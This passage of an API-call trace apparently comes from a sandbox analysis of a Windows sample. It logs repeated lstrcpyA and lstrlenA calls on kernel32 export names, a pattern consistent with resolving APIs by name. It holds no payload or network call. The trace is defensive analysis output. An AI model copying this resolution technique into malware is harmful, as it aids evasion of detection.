lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.262] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.262] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.262] lstrlenA (lpString="COPYFILEA") returned 9 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.262] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.262] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.263] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.263] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.263] lstrlenA (lpString="COPYFILEW") returned 9 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.263] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.263] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.263] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.263] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.263] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.263] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.263] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.264] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.264] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.264] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.264] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.264] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.264] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.264] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.264] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.264] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.264] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.264] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.264] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.264] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.264] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.264] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.264] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.264] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.264] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.265] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.265] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.265] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.265] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.265] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.265] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.265] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.265] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.265] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.265] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.265] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.265] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.265] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.265] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.265] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.265] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.265] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.265] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.265] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.266] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.266] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.266] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.266] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.266] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.266] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.266] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.266] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.266] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.266] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.266] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.266] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.266] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.266] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.266] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.266] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.266] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.266] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.266] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.266] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.267] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.267] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.267] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.267] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.267] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.267] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.267] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.267] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.267] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.267] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.267] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.267] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.267] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.267] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.267] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.267] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.267] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.267] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.267] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.268] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.268] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.268] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.268] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.268] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.268] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.268] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.268] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.268] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.268] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.268] lstrlenA (lpString="DELETEATOM") returned 10 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.268] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.268] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.268] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.268] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.268] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.268] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.268] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.268] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.269] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.269] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.269] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.269] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.269] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.269] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.269] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.269] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.269] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.269] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.269] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.269] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.269] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.269] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.269] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.269] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.269] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.269] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.270] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.270] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.270] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.270] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" 